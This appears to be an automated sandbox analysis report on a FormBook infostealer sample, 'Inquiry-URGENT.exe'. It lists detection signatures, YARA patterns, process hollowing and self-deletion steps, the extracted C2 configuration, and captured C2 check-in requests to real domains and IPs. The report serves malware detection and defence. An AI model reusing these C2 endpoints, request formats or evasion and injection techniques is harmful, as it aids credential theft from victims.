
Windows Analysis Report: Inquiry-URGENT.exe

Overview

General Information

Sample Name: Inquiry-URGENT.exe
Analysis ID: 491567
MD5: 001127ea6a36d3b93e8c54ff1b8f22b8
SHA1: acd9171ec5641efc54a16c5c18184dd6e25138c8
SHA256: 2728dc98fdebc00823b877eba49ace782c17db8a07074634aafca9dc00277776
Tags: exe, Formbook, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Inquiry-URGENT.exe (PID: 6760 cmdline: 'C:\Users\user\Desktop\Inquiry-URGENT.exe' MD5: 001127EA6A36D3B93E8C54FF1B8F22B8)
    • Inquiry-URGENT.exe (PID: 7112 cmdline: C:\Users\user\Desktop\Inquiry-URGENT.exe MD5: 001127EA6A36D3B93E8C54FF1B8F22B8)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 4684 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 3080 cmdline: /c del 'C:\Users\user\Desktop\Inquiry-URGENT.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rheilea.com/b5ce/"], "decoy": ["advellerd.xyz", "giasuvina.com", "arab-xt-pro.com", "ahsltu2ua4.com", "trasportesemmanuel.com", "kissimmeesoccercup.com", "studyengland.com", "m2volleyballclub.com", "shyuehuan.com", "elsml.com", "blog-x-history.top", "coditeu.com", "allattachments.net", "vigautruc.com", "mentication.com", "zambiaedu.xyz", "filadelfiacenter.com", "avlaborsourceinc.info", "tameka-stewart.com", "studio-cleo.com", "cruisebookingsonlineukweb.com", "bajajfinservmutualfund.com", "bipxtech.cloud", "glottogon.com", "villamante.com", "lvfrm.xyz", "bhadanamedia.digital", "austindemolitioncontractor.com", "nutritionhawks.com", "vcmalihx.top", "busybstickerco.com", "lianshangtron.com", "tenncreative.com", "charmfulland.com", "zuridesire.com", "vliegenmetplezier.com", "khlopok.club", "tovardarom.xyz", "atmospheraglobal.com", "lakeefctmich.com", "novasaude-g1.online", "joymort.com", "allexceptionalcapital.com", "balicoffeeuniversal.com", "netjyjin26.net", "arpdomestic.com", "ozglobetips.online", "zeogg.club", "josiemaran-supernatural.com", "sieuthinhapkhau.store", "healthonline.store", "coiincrypt.com", "fofija.com", "yshowmedia.com", "enhancedcr.com", "tous-des-cons.club", "holeinthewallbus.com", "okssl.net", "gutenstocks.com", "thelindleyfamily.com", "apexpropertiesltd.com", "powerhousetepusa.com", "urbanopportunities.com", "comarch.tech"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x16aa9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bbc:$sqlite3step: 68 34 1C 7B E1
  • 0x16ad8:$sqlite3text: 68 38 2A 90 C5
  • 0x16bfd:$sqlite3text: 68 38 2A 90 C5
  • 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.Inquiry-URGENT.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
3.2.Inquiry-URGENT.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.Inquiry-URGENT.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x16aa9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bbc:$sqlite3step: 68 34 1C 7B E1
  • 0x16ad8:$sqlite3text: 68 38 2A 90 C5
  • 0x16bfd:$sqlite3text: 68 38 2A 90 C5
  • 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
2.2.Inquiry-URGENT.exe.3d49a40.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
2.2.Inquiry-URGENT.exe.3d49a40.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x5ce58:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x5d1e2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x68ef5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x689e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x68ff7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x6916f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x5dbfa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x67c5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x5e972:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x6e3c7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x6f46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Source: Process started, Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard, Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3424, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 4684
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Source: Process started, Author: Florian Roth, Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3424, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 4684

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: Inquiry-URGENT.exe, Virustotal: Detection: 36%
Source: Inquiry-URGENT.exe, Metadefender: Detection: 22%
Source: Inquiry-URGENT.exe, ReversingLabs: Detection: 71%
Yara detected FormBook
Source: Yara match, File source: 3.2.Inquiry-URGENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.Inquiry-URGENT.exe.3d49a40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.Inquiry-URGENT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.Inquiry-URGENT.exe.3c9c210.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.trasportesemmanuel.com/b5ce/?7nqLWRV0=6D/QFG40YKklykWOaHa1RXNEJRP+7L8K6Nslrqzy4UJncL0zvFIM5Fri+7k0NXne0nLY&DJE8X=4hlh3, Avira URL Cloud: Label: malware
Source: http://www.trasportesemmanuel.com/b5ce/?7nqLWRV0=6D/QFG40YKklykWOaHa1RXNEJRP, Avira URL Cloud: Label: malware
Source: 3.2.Inquiry-URGENT.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: Inquiry-URGENT.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Inquiry-URGENT.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP, source: Inquiry-URGENT.exe, 00000003.00000002.753164134.000000000117F000.00000040.00000001.sdmp, rundll32.exe, 00000008.00000002.939331902.0000000004C0F000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdb, source: Inquiry-URGENT.exe, 00000003.00000002.754416564.0000000003070000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb, source: Inquiry-URGENT.exe, 00000003.00000002.753164134.000000000117F000.00000040.00000001.sdmp, rundll32.exe
Source: Binary string: rundll32.pdbGCTL, source: Inquiry-URGENT.exe, 00000003.00000002.754416564.0000000003070000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\Inquiry-URGENT.exe, Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4x nop then pop esi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49802 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49802 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49802 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49820 -> 34.252.217.69:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49820 -> 34.252.217.69:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49820 -> 34.252.217.69:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49843 -> 103.100.209.77:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49843 -> 103.100.209.77:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49843 -> 103.100.209.77:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49871 -> 209.99.64.43:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49871 -> 209.99.64.43:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49871 -> 209.99.64.43:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Network Connect: 74.208.236.139 80
Source: C:\Windows\explorer.exe, Network Connect: 213.5.70.60 80
Source: C:\Windows\explorer.exe, Network Connect: 34.252.217.69 80
Source: C:\Windows\explorer.exe, Network Connect: 103.100.209.77 80
Source: C:\Windows\explorer.exe, Domain query: www.tameka-stewart.com
Source: C:\Windows\explorer.exe, Domain query: www.khlopok.club
Source: C:\Windows\explorer.exe, Domain query: www.tovardarom.xyz
Source: C:\Windows\explorer.exe, Network Connect: 184.168.131.241 80
Source: C:\Windows\explorer.exe, Domain query: www.lakeefctmich.com
Source: C:\Windows\explorer.exe, Domain query: www.apexpropertiesltd.com
Source: C:\Windows\explorer.exe, Domain query: www.bajajfinservmutualfund.com
Source: C:\Windows\explorer.exe, Domain query: www.nutritionhawks.com
Source: C:\Windows\explorer.exe, Domain query: www.zambiaedu.xyz
Source: C:\Windows\explorer.exe, Network Connect: 162.241.61.210 80
Source: C:\Windows\explorer.exe, Domain query: www.trasportesemmanuel.com
Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe, Domain query: www.josiemaran-supernatural.com
Source: C:\Windows\explorer.exe, Domain query: www.lianshangtron.com
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe, DNS query: www.tovardarom.xyz
Source: C:\Windows\explorer.exe, DNS query: www.zambiaedu.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.rheilea.com/b5ce/
Source: Joe Sandbox View, ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View, ASN Name: ALTUSNL
Source: global traffic, HTTP traffic detected: GET /b5ce/?7nqLWRV0=/AI3JQDCZyk/6ubsQmnvJO3EeIaIHb6AvonvM2F4xgXAwnTSleK6/XaIEVHpjjtFOEyF&DJE8X=4hlh3 HTTP/1.1, Host: www.josiemaran-supernatural.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii: (empty)
Source: global traffic, HTTP traffic detected: GET /b5ce/?7nqLWRV0=wzjkW/L/N1XOH+XSD0678S8O9bVA9y0oVtkfQbp3MHT7u8jt+16wQlgR8fjrLlP4MYPZ&DJE8X=4hlh3 HTTP/1.1, Host: www.apexpropertiesltd.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii: (empty)
Source: global traffic, HTTP traffic detected: GET /b5ce/?7nqLWRV0=4jQHwSxHHIZwFcDn9YyiwFwOuX4cum7XsZ3DkRiOKi2AyYToUWCX9nZ4+Axc57SiIQXe&DJE8X=4hlh3 HTTP/1.1, Host: www.tameka-stewart.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii: (empty)
Source: global traffic, HTTP traffic detected: GET /b5ce/?7nqLWRV0=kNxZIWTQx5nCNlvJonIYbJCBQmvVcT2X1CiQyYZ2pQhuEOz9vrAvmQg2dhGIWbuOnxMp&DJE8X=4hlh3 HTTP/1.1, Host: www.khlopok.club, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii: (empty)
Source: global traffic, HTTP traffic detected: GET /b5ce/?7nqLWRV0=DJnvNV/6mp+JehKrIaw09sUOMJEcD/JystEz9B9fnmezvaywTqAFSPdXHnxiLUzhPCdJ&DJE8X=4hlh3 HTTP/1.1, Host: www.tovardarom.xyz, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii: (empty)
Source: global traffic, HTTP traffic detected: GET /b5ce/?7nqLWRV0=WdCn/kPOsGECQ6X5wfp65poK7SwinBwjgfqA8CanQGxQHv6Okf04s3qFBz0DbwV5uzgy&DJE8X=4hlh3 HTTP/1.1, Host: www.lianshangtron.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii: (empty)
Source: global traffic, HTTP traffic detected: GET /b5ce/?7nqLWRV0=iJSCg4qWtYnzw4GHWivdfaPpYoJ+2S3Wh/71x72UXIcZgXPac3WPQ9rqQY8gaQxsRQ0f&DJE8X=4hlh3 HTTP/1.1, Host: www.nutritionhawks.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii: (empty)
Source: global traffic, HTTP traffic detected: GET /b5ce/?7nqLWRV0=6D/QFG40YKklykWOaHa1RXNEJRP+7L8K6Nslrqzy4UJncL0zvFIM5Fri+7k0NXne0nLY&DJE8X=4hlh3 HTTP/1.1, Host: www.trasportesemmanuel.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii: (empty)
Source: Joe Sandbox View, IP Address: 184.168.131.241
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Server: nginx/1.18.0 (Ubuntu), Date: Mon, 27 Sep 2021 15:55:33 GMT, Content-Type: text/html; charset=utf-8, Content-Length: 488, Connection: close, Vary: Accept-Encoding, ETag: "5f6c8b3c-1e8", Data Ascii (Cyrillic text restored from the UTF-8 bytes of the raw dump): <!DOCTYPE html><html lang="ru"> <head> <title>404</title> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta content="Запрос не найден или удален" name="description" /> </head> <body> <br/><br/><br/> <center> <h1>Запрошенная страница не найдена или удалена.</h1> </center> </body></html>
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://findquickresultsnow.com/Best_Mortgage_Rates.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://findquickresultsnow.com/Free_Credit_Report.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1N
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://findquickresultsnow.com/Migraine_Pain_Relief.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://findquickresultsnow.com/Top_10_Luxury_Cars.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1N
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://findquickresultsnow.com/Top_Smart_Phones.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1NqQ
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://findquickresultsnow.com/display.cfm
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://findquickresultsnow.com/fashion_trends.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1NqQ4p
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://findquickresultsnow.com/song_lyrics.cfm?domain=trasportesemmanuel.com&fp=LbwnrhNVmFO1NqQ4pPrs
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/js/min.js?v2.3
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/arrow.png)
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/bodybg.png)
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/kwbg.jpg)
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/libg.png)
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/libgh.png)
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/logo.png)
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/search-icon.png)
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: http://www.trasportesemmanuel.com/b5ce/?7nqLWRV0=6D/QFG40YKklykWOaHa1RXNEJRP
Source: rundll32.exe, 00000008.00000002.942415276.00000000051A2000.00000004.00020000.sdmp, String found in binary or memory: https://www.novasaude-g1.online/b5ce/?7nqLWRV0=SAwBm0
Source: unknown, DNS traffic detected: queries for: www.lakeefctmich.com

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 3.2.Inquiry-URGENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Inquiry-URGENT.exe.3d49a40.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.Inquiry-URGENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Inquiry-URGENT.exe.3c9c210.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
